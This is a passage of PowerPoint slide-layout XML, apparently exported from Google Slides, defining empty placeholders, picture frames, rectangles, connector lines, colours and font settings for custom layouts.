              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="225" name="Google Shape;225;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="7735" r="7726" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5908800" y="1292170"/>
            <a:ext cx="2270005" cy="1513338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440419" y="2873364"/>
            <a:ext cx="2263200" cy="484500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5908781" y="2873364"/>
            <a:ext cx="2263200" cy="484500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p23"/>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Columns">
  <p:cSld name="Custom Layout_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="233" name="Shape 233"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1019590" y="1201468"/>
            <a:ext cx="2283976" cy="3538661"/>
            <a:chOff x="1697254" y="1842032"/>
            <a:chExt cx="3045301" cy="4718214"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="235" name="Google Shape;235;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1697255" y="1947146"/>
              <a:ext cx="3045300" cy="4613100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="236" name="Google Shape;236;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="3149254" y="390032"/>
              <a:ext cx="141300" cy="3045300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3420286" y="1201467"/>
            <a:ext cx="2296125" cy="3565800"/>
            <a:chOff x="4800452" y="1842031"/>
            <a:chExt cx="3061500" cy="4754401"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Google Shape;238;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4816435" y="1983332"/>
              <a:ext cx="3045300" cy="4613100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="239" name="Google Shape;239;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="6260552" y="381931"/>
              <a:ext cx="141300" cy="3061500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5840336" y="1201467"/>
            <a:ext cx="2283976" cy="3565801"/>
            <a:chOff x="7952635" y="1842031"/>
            <a:chExt cx="3045301" cy="4754401"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="241" name="Google Shape;241;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7952635" y="1983332"/>
              <a:ext cx="3045300" cy="4613100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
